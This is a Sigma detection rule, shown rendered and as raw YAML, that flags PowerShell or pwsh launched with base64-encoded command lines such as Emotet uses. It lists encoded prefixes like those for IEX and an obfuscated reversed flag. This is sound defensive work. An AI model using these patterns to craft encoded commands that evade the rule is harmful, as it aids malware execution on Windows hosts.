sigmahighHunting

Suspicious Encoded PowerShell Command Line

Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)

MITRE ATT&CK

execution

Detection Query

selection_img:
  - Image|endswith:
      - \powershell.exe
      - \pwsh.exe
  - OriginalFileName:
      - PowerShell.EXE
      - pwsh.dll
selection_cli_enc:
  CommandLine|contains: " -e"
selection_cli_content:
  CommandLine|contains:
    - " JAB"
    - " SUVYI"
    - " SQBFAFgA"
    - " aQBlAHgA"
    - " aWV4I"
    - " IAA"
    - " IAB"
    - " UwB"
    - " cwB"
selection_standalone:
  CommandLine|contains:
    - ".exe -ENCOD "
    - " BA^J e-"
filter_optional_remote_signed:
  CommandLine|contains: " -ExecutionPolicy remotesigned "
condition: selection_img and (all of selection_cli_* or selection_standalone)
  and not 1 of filter_optional_*

Author

Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community

Created

2018-09-03

Data Sources

windowsProcess Creation Events

Platforms

windows

References

https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e

Tags

attack.executionattack.t1059.001

Raw Content

title: Suspicious Encoded PowerShell Command Line
id: ca2092a1-c273-4878-9b4b-0d60115bf5ea
status: test
description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
references:
    - https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e
author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
date: 2018-09-03
modified: 2023-04-06
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_cli_enc:
        CommandLine|contains: ' -e' # covers -en and -enc
    selection_cli_content:
        CommandLine|contains:
            - ' JAB'
            - ' SUVYI'
            - ' SQBFAFgA'
            - ' aQBlAHgA'
            - ' aWV4I'
            - ' IAA'
            - ' IAB'
            - ' UwB'
            - ' cwB'
    selection_standalone:
        CommandLine|contains:
            - '.exe -ENCOD '
            - ' BA^J e-' # Reversed
    filter_optional_remote_signed:
        CommandLine|contains: ' -ExecutionPolicy remotesigned '
    condition: selection_img and (all of selection_cli_* or selection_standalone) and not 1 of filter_optional_*
level: high